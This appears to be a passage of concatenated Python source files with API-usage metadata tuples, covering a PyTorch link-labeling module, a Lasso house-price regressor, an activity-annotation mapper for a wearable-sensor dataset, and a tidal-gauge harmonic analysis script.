pitch)\n', (2174, 2240), False, 'from camera_augmentation import convertdegree2euler, rotate_camera, get_intrinsic, check_in_frame\n'), ((51, 76), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (66, 76), False, 'import os\n'), ((1881, 1897), 'numpy.array', 'np.array', (['AXIS_Z'], {}), '(AXIS_Z)\n', (1889, 1897), True, 'import numpy as np\n'), ((1980, 2038), 'numpy.dot', 'np.dot', (['Rw2c_rotation_augmented.T', 'Tw2c_rotation_augmented'], {}), '(Rw2c_rotation_augmented.T, Tw2c_rotation_augmented)\n', (1986, 2038), True, 'import numpy as np\n'), ((2328, 2380), 'numpy.dot', 'np.dot', (['Rw2c_pitch_augmented.T', 'Tw2c_pitch_augmented'], {}), '(Rw2c_pitch_augmented.T, Tw2c_pitch_augmented)\n', (2334, 2380), True, 'import numpy as np\n'), ((1103, 1125), 'numpy.arange', 'np.arange', (['(-50)', '(50)', '(10)'], {}), '(-50, 50, 10)\n', (1112, 1125), True, 'import numpy as np\n'), ((1167, 1189), 'numpy.arange', 'np.arange', (['(-50)', '(50)', '(10)'], {}), '(-50, 50, 10)\n', (1176, 1189), True, 'import numpy as np\n'), ((1527, 1549), 'numpy.array', 'np.array', (['CENTER_POINT'], {}), '(CENTER_POINT)\n', (1535, 1549), True, 'import numpy as np\n'), ((2545, 2635), 'camera_augmentation.get_intrinsic', 'get_intrinsic', (['cam_idx'], {'fx_bais': 'f_bais', 'fy_bais': 'f_bais', 'cx_bias': 'c_bias', 'cy_bias': 'c_bias'}), '(cam_idx, fx_bais=f_bais, fy_bais=f_bais, cx_bias=c_bias,\n cy_bias=c_bias)\n', (2558, 2635), False, 'from camera_augmentation import convertdegree2euler, rotate_camera, get_intrinsic, check_in_frame\n'), ((2663, 2768), 'lib.camera.camera.CameraInfoPacket', 'CameraInfoPacket', ([], {'P': 'None', 'K': 'K', 'R': 'Rw2c_pitch_augmented', 't': 'Tw2c_pitch_augmented', 'dist_coeff': 'dist_coeff'}), '(P=None, K=K, R=Rw2c_pitch_augmented, t=\n Tw2c_pitch_augmented, dist_coeff=dist_coeff)\n', (2679, 2768), False, 'from lib.camera.camera import CameraInfoPacket, catesian2homogenous\n'), ((3837, 3862), 'camera_augmentation.mkdirs', 'mkdirs', (['CAMERA_PARAM_PATH'], {}), '(CAMERA_PARAM_PATH)\n', (3843, 3862), False, 'from camera_augmentation import init_camera_h36m, get_camera_pose, camera_translation, mkdirs\n'), ((3875, 3895), 'camera_augmentation.mkdirs', 'mkdirs', (['POSE_2D_PATH'], {}), '(POSE_2D_PATH)\n', (3881, 3895), False, 'from camera_augmentation import init_camera_h36m, get_camera_pose, camera_translation, mkdirs\n'), ((5865, 5931), 'numpy.savez', 'np.savez', (['POSE2D_FILENAME'], {'metadata': 'METADATA', 'positions_2d': 'pose_2d'}), '(POSE2D_FILENAME, metadata=METADATA, positions_2d=pose_2d)\n', (5873, 5931), True, 'import numpy as np\n'), ((1329, 1372), 'numpy.load', 'np.load', (['FILE_TO_3D_POSE'], {'allow_pickle': '(True)'}), '(FILE_TO_3D_POSE, allow_pickle=True)\n', (1336, 1372), True, 'import numpy as np\n'), ((5264, 5309), 'json.dump', 'json.dump', (['[camera_param]', 'file_obj'], {'indent': '(4)'}), '([camera_param], file_obj, indent=4)\n', (5273, 5309), False, 'import json\n'), ((3164, 3191), 'lib.camera.camera.catesian2homogenous', 'catesian2homogenous', (['kpt_3d'], {}), '(kpt_3d)\n', (3183, 3191), False, 'from lib.camera.camera import CameraInfoPacket, catesian2homogenous\n'), ((3338, 3374), 'camera_augmentation.check_in_frame', 'check_in_frame', (['kpt_2d', 'RES_W', 'RES_H'], {}), '(kpt_2d, RES_W, RES_H)\n', (3352, 3374), False, 'from camera_augmentation import convertdegree2euler, rotate_camera, get_intrinsic, check_in_frame\n')]
|
# basics
from typing import List, Tuple, DefaultDict, Dict, Union
from collections import defaultdict
import pandas as pd
import numpy as np
# pytorch
import torch
from torch import Tensor
import torch.nn as nn
import torch.nn.functional as F
#segnlp
from segnlp import utils
class DirLinkLabeler(nn.Module):
"""
Direktional Link Labeler work on the level of all possible pairs. It takes all bi-directional pairs
between segments and predicts the directional labels including None for no link and root for pointing
to itself.
"""
def __init__(self,
input_size:int,
output_size:int,
match_threshold : float = 0.5,
loss_reduction = "mean",
ignore_index = -1,
weight_init : Union[str, dict] = None,
):
super().__init__()
self.loss_reduction = loss_reduction
self.ignore_index = ignore_index
self.match_threshold = match_threshold
# if we have link labels {root, REL1, REL2} we will predict the folowing labels
# {None, root, REL1, REL2, REL1-rev, REL2-rev}
# 0 1 2 3 4 5
self.link_labels_wo_root = output_size -1
self.rev_label_treshhold = output_size
output_size = ((output_size -1) * 2 ) + 2
self.clf = nn.Linear(input_size, output_size)
utils.init_weights(self, weight_init)
def __get_preds(self,
logits: Tensor,
pair_p1: Tensor,
pair_p2: Tensor,
sample_id: Tensor
):
# we take the max value and labels for each of the Link labels
v, l = torch.max(logits, dim=-1)
pair_p1 = utils.ensure_numpy(pair_p1)
pair_p2 = utils.ensure_numpy(pair_p2)
#then we build a df
df = pd.DataFrame(
{
"value": v.detach().numpy(),
"label": l.detach().numpy(),
"p1": pair_p1,
"p2": pair_p2,
}
)
# for each pair where the prediction is a X-rev relation we need to swap the order of the
# member of the pair. I.e. if we have a pair ( p1, p2) where the label is X-rev we swap places
# on p1 and p2. What this does is make p1 our column for SOURCE and p2 our column for TARGET.
# this means that the value of p2 is the index of all the segments in a sample p1 is related to.
p1_p2 = df.loc[:, ["p1", "p2"]].to_numpy()
p1_p2_new = np.zeros_like(p1_p2)
rev_preds_filter = (df["label"] > self.rev_label_treshhold).to_numpy()
p1_p2_new[rev_preds_filter, 0] = p1_p2[rev_preds_filter, 1]
p1_p2_new[rev_preds_filter, 1] = p1_p2[rev_preds_filter, 0]
p1_p2_new[~rev_preds_filter, 0] = p1_p2[~rev_preds_filter, 0]
p1_p2_new[~rev_preds_filter, 1] = p1_p2[~rev_preds_filter, 1]
df.loc[:, ["p1", "p2"]] = p1_p2_new
#after we have set SOURCE and TARGETS we normalize the link_labels to non-"-Rev" labels
df.loc[rev_preds_filter, "label"] -= self.link_labels_wo_root
# We can filter out all pair where prediction is 0 ( None), which means that the pairs
# are predicted to not link, (or more correct "there is no relation between").
# However, each segments needs to link to something however, because we can predict 0
# for all pairs with a certain source, we need to set the label for those pairs to a
# default value, i.e. themselves. SO, for each segments where all predictions are 0, we set the
# link to be equal to itself.
no_link = df["label"] != 0
self_refs = df["p1"] == df["p2"]
cond = np.logical_or(no_link, self_refs)
df.loc[cond, "label"] = 1 # set the label to root
df = df[cond] # remove all rows where label == 0 except where p1 == p2
#as we also move down labels by 1 so thay we are matching original layers, .e.g. None is
# not a valid link_label
df.loc[:, "label"] -= 1
# Lastly we want to sort all the pairs then select the row for
# for each unique p1, starting segments. I.e. we get the highested scored
# link and link_label for any unqiue segment p1
df.sort_values(by=['value'], inplace=True, ascending=False)
seg_df = df.groupby("p1").first()
# lastly, we need to turn p2 inte link, i.e. p2 refer to an unique seg in the batch
# but links needs to be a index to a segment in a sample
# To normalize p2 we subtract with the utils.cumsum_zero() of all sample segment lengths
# I.e. the start of the global segment id for each sample
lengths_segs = pd.DataFrame({"p1": pair_p1, "sample_id":sample_id}).groupby("sample_id", sort = False)["p1"].nunique().to_numpy()
g_seg_starts = utils.np_cumsum_zero(lengths_segs)
seg_df["link"] = seg_df.pop("p2") - np.repeat(g_seg_starts, lengths_segs)
link_label_preds = seg_df["label"].to_numpy()
links = seg_df["link"].to_numpy()
return link_label_preds, links
def forward(self,
input:Tensor,
pair_p1 : Tensor,
pair_p2 : Tensor,
sample_id: Tensor,
):
logits = self.clf(input)
link_labels, links = self.__get_preds(
logits = logits,
pair_p1 = pair_p1,
pair_p2 = pair_p2,
sample_id = sample_id,
)
return logits, link_labels, links
def loss(self,
targets: Tensor,
logits: Tensor,
directions: Tensor,
true_link: Tensor,
p1_match_ratio: Tensor,
p2_match_ratio: Tensor
):
# creating a mask over all pairs which tells us which pairs include a segments
# which is not a TRUE segment, i.e. overlaps with a ground truth segments to a certain
# configurable extent
cond1 = p1_match_ratio >= self.match_threshold
cond2 = p2_match_ratio >= self.match_threshold
true_segs = torch.logical_and(
cond1,
cond2,
)
# then we combine the true_seg mask with true link mask and negate it so we have a mask
# which is True on each position the pair should be a NEGATIVE SAMPLE
neg_mask = ~torch.logical_and(
true_segs,
true_link
)
# target labels are not directional so we need to make them so. Targets also lack
# label for no link. So, we first add 1 too all labels moving them up freeing 0 for None label for no links.
# then for all directions which are 2 (backwards/reversed) we add the number of link_labels (minus root)
targets += 1
targets[directions == 2] += self.link_labels_wo_root
# neg_mask include all the pairs which should be countet as non linking pairs, e.g. label None.
# this mask is usually created from all segs that are not linked or pairs that include segments which
# are not true segments.
targets[neg_mask] = 0
loss = F.cross_entropy(
logits,
targets,
reduction=self.loss_reduction,
ignore_index=self.ignore_index
)
return loss
|
[
"pandas.DataFrame",
"numpy.zeros_like",
"segnlp.utils.np_cumsum_zero",
"torch.nn.functional.cross_entropy",
"segnlp.utils.ensure_numpy",
"torch.nn.Linear",
"torch.max",
"numpy.logical_or",
"numpy.repeat",
"segnlp.utils.init_weights",
"torch.logical_and"
] |
[((1376, 1410), 'torch.nn.Linear', 'nn.Linear', (['input_size', 'output_size'], {}), '(input_size, output_size)\n', (1385, 1410), True, 'import torch.nn as nn\n'), ((1419, 1456), 'segnlp.utils.init_weights', 'utils.init_weights', (['self', 'weight_init'], {}), '(self, weight_init)\n', (1437, 1456), False, 'from segnlp import utils\n'), ((1746, 1771), 'torch.max', 'torch.max', (['logits'], {'dim': '(-1)'}), '(logits, dim=-1)\n', (1755, 1771), False, 'import torch\n'), ((1790, 1817), 'segnlp.utils.ensure_numpy', 'utils.ensure_numpy', (['pair_p1'], {}), '(pair_p1)\n', (1808, 1817), False, 'from segnlp import utils\n'), ((1836, 1863), 'segnlp.utils.ensure_numpy', 'utils.ensure_numpy', (['pair_p2'], {}), '(pair_p2)\n', (1854, 1863), False, 'from segnlp import utils\n'), ((2700, 2720), 'numpy.zeros_like', 'np.zeros_like', (['p1_p2'], {}), '(p1_p2)\n', (2713, 2720), True, 'import numpy as np\n'), ((3907, 3940), 'numpy.logical_or', 'np.logical_or', (['no_link', 'self_refs'], {}), '(no_link, self_refs)\n', (3920, 3940), True, 'import numpy as np\n'), ((5051, 5085), 'segnlp.utils.np_cumsum_zero', 'utils.np_cumsum_zero', (['lengths_segs'], {}), '(lengths_segs)\n', (5071, 5085), False, 'from segnlp import utils\n'), ((6444, 6475), 'torch.logical_and', 'torch.logical_and', (['cond1', 'cond2'], {}), '(cond1, cond2)\n', (6461, 6475), False, 'import torch\n'), ((7654, 7753), 'torch.nn.functional.cross_entropy', 'F.cross_entropy', (['logits', 'targets'], {'reduction': 'self.loss_reduction', 'ignore_index': 'self.ignore_index'}), '(logits, targets, reduction=self.loss_reduction,\n ignore_index=self.ignore_index)\n', (7669, 7753), True, 'import torch.nn.functional as F\n'), ((5130, 5167), 'numpy.repeat', 'np.repeat', (['g_seg_starts', 'lengths_segs'], {}), '(g_seg_starts, lengths_segs)\n', (5139, 5167), True, 'import numpy as np\n'), ((6784, 6823), 'torch.logical_and', 'torch.logical_and', (['true_segs', 'true_link'], {}), '(true_segs, true_link)\n', (6801, 6823), False, 'import torch\n'), ((4912, 4965), 'pandas.DataFrame', 'pd.DataFrame', (["{'p1': pair_p1, 'sample_id': sample_id}"], {}), "({'p1': pair_p1, 'sample_id': sample_id})\n", (4924, 4965), True, 'import pandas as pd\n')]
|
import logging
import numpy as np
import pandas as pd
from sklearn import linear_model
RESOURCE_DIR = '/home/lucasx/PycharmProjects/DataHouse/DataSet/'
logging.basicConfig(format='%(levelname)s:%(asctime)s:%(message)s \t', level=logging.INFO, filemode='a',
filename='loginfo.log')
def train_and_predict(filepath):
df = pd.read_excel(filepath, 'HouseInfo')
def _preprocessing(dataframe):
dataframe['buildYear'] = dataframe['buildYear'].fillna(np.median(dataframe['buildYear'].dropna()))
label_and_value = {
"武昌": 1,
"江岸": 2,
"江汉": 3,
"硚口": 4,
"洪山": 5,
"青山": 6,
"汉阳": 7,
"东西湖": 8,
"沌口开发区": 9,
"江夏": 10,
"黄陂": 11,
"其他": 12,
"蔡甸": 13,
"汉南": 14,
"新洲": 15
}
dataframe['areaCode'] = [label_and_value[i] for i in dataframe['area']]
return dataframe
df = _preprocessing(dataframe=df).loc[:, ['areaCode', 'buildYear', 'saleNum', 'midPrice']]
df.to_excel(RESOURCE_DIR + 'data.xlsx', sheet_name='Sheet1')
X_digits = df.loc[:, ['areaCode', 'buildYear', 'saleNum']]
y_digits = df.loc[:, ['midPrice']]
regression = linear_model.Lasso(alpha=0.1)
# do cross-validation
X_folds = np.array_split(X_digits, 10)
y_folds = np.array_split(y_digits, 10)
scores = list()
for k in range(10):
X_train = list(X_folds)
X_test = X_train.pop(k)
X_train = np.concatenate(X_train)
y_train = list(y_folds)
y_test = y_train.pop(k)
y_train = np.concatenate(y_train)
scores.append(regression.fit(X_train, y_train).score(X_test, y_test))
logging.info(scores)
from sklearn.externals import joblib
joblib.dump(regression, RESOURCE_DIR + 'reg_model.pkl')
print(
'The max inference accuracy is {:%}'.format(np.array(scores).max()))
def inference(areaCode, buildYear, saleNum):
from sklearn.externals import joblib
regression = joblib.load(RESOURCE_DIR + 'reg_model.pkl')
predict_price = regression.predict(np.array([areaCode, buildYear, saleNum]).reshape(1, 3))
return predict_price
if __name__ == '__main__':
# train_and_predict(RESOURCE_DIR + 'anjuke.xlsx')
price = inference(1, 2015, 1611)
print('Your house worths %d RMB.' % price)
|
[
"sklearn.externals.joblib.dump",
"numpy.concatenate",
"logging.basicConfig",
"pandas.read_excel",
"logging.info",
"numpy.array",
"sklearn.externals.joblib.load",
"numpy.array_split",
"sklearn.linear_model.Lasso"
] |
[((154, 286), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': '"""%(levelname)s:%(asctime)s:%(message)s \t"""', 'level': 'logging.INFO', 'filemode': '"""a"""', 'filename': '"""loginfo.log"""'}), "(format='%(levelname)s:%(asctime)s:%(message)s \\t',\n level=logging.INFO, filemode='a', filename='loginfo.log')\n", (173, 286), False, 'import logging\n'), ((347, 383), 'pandas.read_excel', 'pd.read_excel', (['filepath', '"""HouseInfo"""'], {}), "(filepath, 'HouseInfo')\n", (360, 383), True, 'import pandas as pd\n'), ((1276, 1305), 'sklearn.linear_model.Lasso', 'linear_model.Lasso', ([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (1294, 1305), False, 'from sklearn import linear_model\n'), ((1347, 1375), 'numpy.array_split', 'np.array_split', (['X_digits', '(10)'], {}), '(X_digits, 10)\n', (1361, 1375), True, 'import numpy as np\n'), ((1390, 1418), 'numpy.array_split', 'np.array_split', (['y_digits', '(10)'], {}), '(y_digits, 10)\n', (1404, 1418), True, 'import numpy as np\n'), ((1757, 1777), 'logging.info', 'logging.info', (['scores'], {}), '(scores)\n', (1769, 1777), False, 'import logging\n'), ((1824, 1879), 'sklearn.externals.joblib.dump', 'joblib.dump', (['regression', "(RESOURCE_DIR + 'reg_model.pkl')"], {}), "(regression, RESOURCE_DIR + 'reg_model.pkl')\n", (1835, 1879), False, 'from sklearn.externals import joblib\n'), ((2074, 2117), 'sklearn.externals.joblib.load', 'joblib.load', (["(RESOURCE_DIR + 'reg_model.pkl')"], {}), "(RESOURCE_DIR + 'reg_model.pkl')\n", (2085, 2117), False, 'from sklearn.externals import joblib\n'), ((1545, 1568), 'numpy.concatenate', 'np.concatenate', (['X_train'], {}), '(X_train)\n', (1559, 1568), True, 'import numpy as np\n'), ((1651, 1674), 'numpy.concatenate', 'np.concatenate', (['y_train'], {}), '(y_train)\n', (1665, 1674), True, 'import numpy as np\n'), ((2157, 2197), 'numpy.array', 'np.array', (['[areaCode, buildYear, saleNum]'], {}), '([areaCode, buildYear, saleNum])\n', (2165, 2197), True, 'import numpy as np\n'), ((1944, 1960), 'numpy.array', 'np.array', (['scores'], {}), '(scores)\n', (1952, 1960), True, 'import numpy as np\n')]
|
from .. import moment
from .. import mhealth_format as mh
import numpy as np
import pkg_resources
import pandas as pd
from loguru import logger
def _get_annotation_durations(annot_df):
durations = annot_df.groupby(annot_df.columns[3]).apply(
lambda rows: np.sum(rows.iloc[:, 2] - rows.iloc[:, 1]))
return durations
def _annot_to_activity(annot_df, pid, start_time, stop_time):
if annot_df is None:
return "Unknown"
if annot_df.shape[0] == 0:
return "Unknown"
label_list = annot_df[mh.ANNOTATION_LABEL_COL].str.lower()
annot_df[mh.ANNOTATION_LABEL_COL] = label_list
annot_df = annot_df.loc[(label_list != 'wear on')
& (label_list != 'wearon'), :]
if annot_df.shape[0] == 0:
return "Unknown"
labels = annot_df.iloc[:, 3].unique()
labels.sort()
label = ' '.join(labels).lower().strip()
# filter if it does not cover the entire 12.8s
durations = _get_annotation_durations(annot_df)
interval = int(moment.Moment.get_duration(
start_time, stop_time, unit='ms'))
if not np.all(durations.values >= np.timedelta64(interval, 'ms')):
return "Transition"
# special cases
if pid == 'SPADES_26':
if 'biking' in label and start_time.hour == 11 and stop_time.minute > 26:
return "Stationary cycle ergometry"
elif pid == 'SPADES_19':
if '3 mph' in label and 'arms on desk' in label and 'treadmill' in label:
return "Level treadmill walking at 3 mph with arms on desk"
if 'stairs' in label and 'up' in label:
return 'Walking upstairs'
elif 'stairs' in label and 'down' in label:
return 'Walking downstairs'
if 'mbta' in label or 'city' in label or 'outdoor' in label:
return 'Unknown'
if "sitting" in label and 'writing' in label:
return 'Sitting and writing'
elif 'stand' in label and 'writ' in label:
return 'Standing and writing at a table'
elif 'sit' in label and ('web' in label or 'typ' in label):
return 'Sitting and typing on a keyboard'
elif 'reclin' in label and ('text' in label or 'web' in label):
return 'Reclining and using phone'
elif 'sit' in label and 'story' in label and ('city' not in label and 'outdoor' not in label):
return "Sitting and talking"
elif "reclin" in label and 'story' in label:
return 'Reclining and talking'
elif "stand" in label and ('web' in label or 'typ' in label):
return "Standing and typing on a keyboard"
elif 'bik' in label and ('stationary' in label or '300' in label):
return "Stationary cycle ergometry"
elif ('treadmill' in label or 'walk' in label) and '1' in label:
return "Level treadmill walking at 1 mph with arms on desk"
elif ('treadmill' in label or 'walk' in label) and '2' in label:
return "Level treadmill walking at 2 mph with arms on desk"
elif 'treadmill' in label and 'phone' in label:
return "Level treadmill walking at 3-3.5 mph while holding a phone to the ear and talking"
elif 'treadmill' in label and 'bag' in label:
return "Level treadmill walking at 3-3.5 mph and carrying a bag"
elif 'treadmill' in label and 'story' in label:
return "Level treadmill walking at 3-3.5 mph while talking"
elif ('treadmill' in label or 'walk' in label) and 'drink' in label:
return 'Level treadmill walking at 3-3.5 mph and carrying a drink'
elif ('treadmill' in label or 'walk' in label) and ('3.5' in label or '3' in label):
return 'Level treadmill walking at 3-3.5 mph'
elif '5.5' in label or 'jog' in label or 'run' in label:
return 'Treadmill running at 5.5 mph & 5% grade'
elif 'laundry' in label:
return 'Standing and folding towels'
elif 'sweep' in label:
return 'Standing and sweeping'
elif 'shelf' in label and 'load' in label:
return 'Standing loading/unloading shelf'
elif 'lying' in label:
return "Lying on the back"
elif label == 'sitting' or ('sit' in label and 'still' in label):
return "Sitting still"
elif label == "still" or 'standing' == label or label == 'standing still':
return "Self-selected free standing"
else:
return 'Unknown'
def _load_task_class_map():
map_filepath = pkg_resources.resource_filename(
'arus', 'spades_lab/task_class_map.csv')
return pd.read_csv(map_filepath)
def class_set(*annot_dfs, task_names=None, st=None, et=None, pid=None, **kwargs):
class_labels = {mh.TIMESTAMP_COL: [st],
mh.START_TIME_COL: [st],
mh.STOP_TIME_COL: [et]}
task_class_map = _load_task_class_map()
annot_df = annot_dfs[0]
activity = _annot_to_activity(annot_df, pid, st, et)
for task_name in task_names:
if task_name not in task_class_map.columns:
logger.warning(
f"{task_name} is not a valid task name for the current dataset")
else:
class_label = task_class_map.loc[task_class_map.ACTIVITY ==
activity, task_name]
class_labels[task_name] = class_label.values.tolist()
class_vector = pd.DataFrame.from_dict(class_labels)
return class_vector
|
[
"numpy.sum",
"pandas.DataFrame.from_dict",
"pandas.read_csv",
"loguru.logger.warning",
"pkg_resources.resource_filename",
"numpy.timedelta64"
] |
[((4347, 4419), 'pkg_resources.resource_filename', 'pkg_resources.resource_filename', (['"""arus"""', '"""spades_lab/task_class_map.csv"""'], {}), "('arus', 'spades_lab/task_class_map.csv')\n", (4378, 4419), False, 'import pkg_resources\n'), ((4440, 4465), 'pandas.read_csv', 'pd.read_csv', (['map_filepath'], {}), '(map_filepath)\n', (4451, 4465), True, 'import pandas as pd\n'), ((5245, 5281), 'pandas.DataFrame.from_dict', 'pd.DataFrame.from_dict', (['class_labels'], {}), '(class_labels)\n', (5267, 5281), True, 'import pandas as pd\n'), ((269, 310), 'numpy.sum', 'np.sum', (['(rows.iloc[:, 2] - rows.iloc[:, 1])'], {}), '(rows.iloc[:, 2] - rows.iloc[:, 1])\n', (275, 310), True, 'import numpy as np\n'), ((4911, 4990), 'loguru.logger.warning', 'logger.warning', (['f"""{task_name} is not a valid task name for the current dataset"""'], {}), "(f'{task_name} is not a valid task name for the current dataset')\n", (4925, 4990), False, 'from loguru import logger\n'), ((1124, 1154), 'numpy.timedelta64', 'np.timedelta64', (['interval', '"""ms"""'], {}), "(interval, 'ms')\n", (1138, 1154), True, 'import numpy as np\n')]
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Sun Feb 24 13:31:37 2019
@author: gsolana
Based on:
https://github.com/sam-cox/pytides/wiki/How-to-make-your-own-Tide-Table-using-Python-and-Pytides
https://ocefpaf.github.io/python4oceanographers/blog/2014/07/07/pytides/
"""
import csv
import numpy as np
import pandas as pd
from pandas import read_csv, DataFrame
from datetime import datetime, timedelta
import matplotlib.pyplot as plt
from pytides import tide
from pytides import constituent
##Import our tidal data
filepath='../data/sealevel/'
def ibane_deck2017():
"""
Read and descompese Inhambanes deck tidal gauge seal level serie
"""
t = []
heights = []
filename='Datos_mareografo_c.csv'
csv_file = open(filepath+filename, 'r')
reader = csv.reader(csv_file)
next(reader)
next(reader)
for row in reader:
#print(" ".join(row[:6]))
a=row[0]+" "+row[1]
t.append(datetime.strptime(a, "%y/%m/%d %H:%M:%S"))
heights.append(float((row[3])))
csv_file.close()
##Fit the tidal data to the harmonic model using Pytides
ibaneconst= [ constituent._M2,
constituent._S2,
constituent._N2,
constituent._K2,
constituent._K1,
constituent._O1]
my_tide = tide.Tide.decompose(np.array(heights[::1]), np.array(t[::1]), constituents=ibaneconst)
return t, heights, my_tide
def readUHSML():
'''#Read UHSML 2011 dataset
'''
t = []
heights = []
filename2011='Inhambane_2011-07-02_2011-09-27_h900a.csv'
csv_file2011 = open(filepath+filename2011, 'r')
reader = csv.reader(csv_file2011, delimiter=',')
for row in reader:
tmp = float(row[4])
if (tmp <= -30000) :
next(reader)
else:
#print(" ".join(row[:6]))
a=row[0]+"/"+row[1]+"/"+row[2]+" "+row[3]
t.append(datetime.strptime(a, "%Y/%m/%d %H") - 0*timedelta(hours=1.15))
heights.append(float((row[4]))/1000)
csv_file2011.close()
##UHSLC Fit the tidal data to the harmonic model using Pytides
my_tide2011 = tide.Tide.decompose(np.array(heights[::]), np.array(t[::]))
return t, heights, my_tide2011
def read_otpx():
"""
"""
otpx_prediction='/home/gsolana/Work/UP_Unisaf/00 PesquisaEXtensao/2017 Modelicacao Baia/00_Work/00_Python/Datos/tpxo/ibane_predict_OTPX_9v1.out'
otpx_prediction='ibane_predict_OTPX_9v1.out'
#Read TPXO Atlas data prediction
otpx_pred=read_csv(
filepath+otpx_prediction,
sep=r'\s+',
header=3,
skiprows=6,
names=['Lat', 'Lon', 'Date', 'Time', 'Z', 'Depth'],
parse_dates = {'date_col' : ["Date", "Time"]}
)
#Change date_col to strin to datetime format
otpx_pred['date_col'] = pd.to_datetime(otpx_pred['date_col'])
##Fit the tidal data to the harmonic model using Pytides
OTPX_tide = tide.Tide.decompose(otpx_pred.Z, otpx_pred.date_col)
return otpx_pred.date_col, otpx_pred.Z, OTPX_tide
def saveFig(file=""):
""" Save the figure
INPUT:
filename : the complete filename (path + filename + extension)
"""
if file != "":
plt.savefig('../sample/'+file+'.png', format='png', dpi=300)
plt.savefig('../sample/'+file+'.pdf', format='pdf', dpi=300, transparent=True)
def main():
"""
"""
# Ibane tidal gauge
ibane_t, ibane_heights, ibane_tide = ibane_deck2017()
constituent = [c.name for c in ibane_tide.model['constituent']]
df_ibane = DataFrame(ibane_tide.model, index=constituent).drop('constituent', axis=1)
##############################################################################
##UHSLC Fit the tidal data to the harmonic model using Pytides
t, heights, UHSLM_tide2011 = readUHSML()
##UHSLC Fit the tidal data to the harmonic model using Pytides
#UHSLM_tide2011 = tide.Tide.decompose(np.array(heights[::]), np.array(t[::]))
#constituent = [c.name for c in tide.model['constituent']]
UHSLM_constituent = [c.name for c in UHSLM_tide2011.model['constituent']]
UHSLM_df2011 = DataFrame(UHSLM_tide2011.model, index=UHSLM_constituent).drop('constituent', axis=1)
UHSLM_prediction201707 = UHSLM_tide2011.at(ibane_t)
##############################################################################
otpx_t, otpx_z, OTPX_tide=read_otpx()
OTPX_constituent = [c.name for c in OTPX_tide.model['constituent']]
OTPX_df = DataFrame(OTPX_tide.model, index=OTPX_constituent).drop('constituent', axis=1)
OTPX_prediction201707=OTPX_tide.at(ibane_t)
#################################################################################
fig = plt.figure(figsize=(6,4))
fig.suptitle('Tidal level',fontsize=9)
ax2 = plt.subplot()
ax2.grid(b=True, linestyle='-')
ax2.plot(ibane_t,
ibane_heights-df_ibane.amplitude['Z0'],
"-",
c="red",
label="2017 Observed Ibane deck")
ax2.plot(ibane_t,
UHSLM_prediction201707-UHSLM_df2011.amplitude['Z0'],
"-",
c="blue",
label="UHSLC 2017 Modeled")
ax2.plot(ibane_t,
OTPX_prediction201707-OTPX_df.amplitude['Z0'],
"-",
c="green",
label="TPXO Atlas Modeled")
ax2.set_xticklabels(ax2.get_xticklabels(),rotation=-45,horizontalalignment='center')
#ax2.set_xlabel('Date')
yrange = (-1.50, 1.5)
ax2.set_ylim(yrange)
ax2.set_ylabel('Sea level (m)')
ax2.legend(loc ='lower center',fontsize=8)
#plt.tight_layout()
fig.show()
saveFig(file='tidalcomparation')
if __name__ == "__main__":
main()
|
[
"pandas.DataFrame",
"matplotlib.pyplot.subplot",
"pytides.tide.Tide.decompose",
"csv.reader",
"pandas.read_csv",
"matplotlib.pyplot.figure",
"datetime.datetime.strptime",
"pandas.to_datetime",
"numpy.array",
"datetime.timedelta",
"matplotlib.pyplot.savefig"
] |
[((828, 848), 'csv.reader', 'csv.reader', (['csv_file'], {}), '(csv_file)\n', (838, 848), False, 'import csv\n'), ((1731, 1770), 'csv.reader', 'csv.reader', (['csv_file2011'], {'delimiter': '""","""'}), "(csv_file2011, delimiter=',')\n", (1741, 1770), False, 'import csv\n'), ((2620, 2795), 'pandas.read_csv', 'read_csv', (['(filepath + otpx_prediction)'], {'sep': '"""\\\\s+"""', 'header': '(3)', 'skiprows': '(6)', 'names': "['Lat', 'Lon', 'Date', 'Time', 'Z', 'Depth']", 'parse_dates': "{'date_col': ['Date', 'Time']}"}), "(filepath + otpx_prediction, sep='\\\\s+', header=3, skiprows=6,\n names=['Lat', 'Lon', 'Date', 'Time', 'Z', 'Depth'], parse_dates={\n 'date_col': ['Date', 'Time']})\n", (2628, 2795), False, 'from pandas import read_csv, DataFrame\n'), ((2953, 2990), 'pandas.to_datetime', 'pd.to_datetime', (["otpx_pred['date_col']"], {}), "(otpx_pred['date_col'])\n", (2967, 2990), True, 'import pandas as pd\n'), ((3073, 3125), 'pytides.tide.Tide.decompose', 'tide.Tide.decompose', (['otpx_pred.Z', 'otpx_pred.date_col'], {}), '(otpx_pred.Z, otpx_pred.date_col)\n', (3092, 3125), False, 'from pytides import tide\n'), ((4918, 4944), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(6, 4)'}), '(figsize=(6, 4))\n', (4928, 4944), True, 'import matplotlib.pyplot as plt\n'), ((5003, 5016), 'matplotlib.pyplot.subplot', 'plt.subplot', ([], {}), '()\n', (5014, 5016), True, 'import matplotlib.pyplot as plt\n'), ((1412, 1434), 'numpy.array', 'np.array', (['heights[::1]'], {}), '(heights[::1])\n', (1420, 1434), True, 'import numpy as np\n'), ((1436, 1452), 'numpy.array', 'np.array', (['t[::1]'], {}), '(t[::1])\n', (1444, 1452), True, 'import numpy as np\n'), ((2248, 2268), 'numpy.array', 'np.array', (['heights[:]'], {}), '(heights[:])\n', (2256, 2268), True, 'import numpy as np\n'), ((2271, 2285), 'numpy.array', 'np.array', (['t[:]'], {}), '(t[:])\n', (2279, 2285), True, 'import numpy as np\n'), ((3362, 3426), 'matplotlib.pyplot.savefig', 'plt.savefig', (["('../sample/' + file + '.png')"], {'format': '"""png"""', 'dpi': '(300)'}), "('../sample/' + file + '.png', format='png', dpi=300)\n", (3373, 3426), True, 'import matplotlib.pyplot as plt\n'), ((3431, 3517), 'matplotlib.pyplot.savefig', 'plt.savefig', (["('../sample/' + file + '.pdf')"], {'format': '"""pdf"""', 'dpi': '(300)', 'transparent': '(True)'}), "('../sample/' + file + '.pdf', format='pdf', dpi=300,\n transparent=True)\n", (3442, 3517), True, 'import matplotlib.pyplot as plt\n'), ((987, 1028), 'datetime.datetime.strptime', 'datetime.strptime', (['a', '"""%y/%m/%d %H:%M:%S"""'], {}), "(a, '%y/%m/%d %H:%M:%S')\n", (1004, 1028), False, 'from datetime import datetime, timedelta\n'), ((3737, 3783), 'pandas.DataFrame', 'DataFrame', 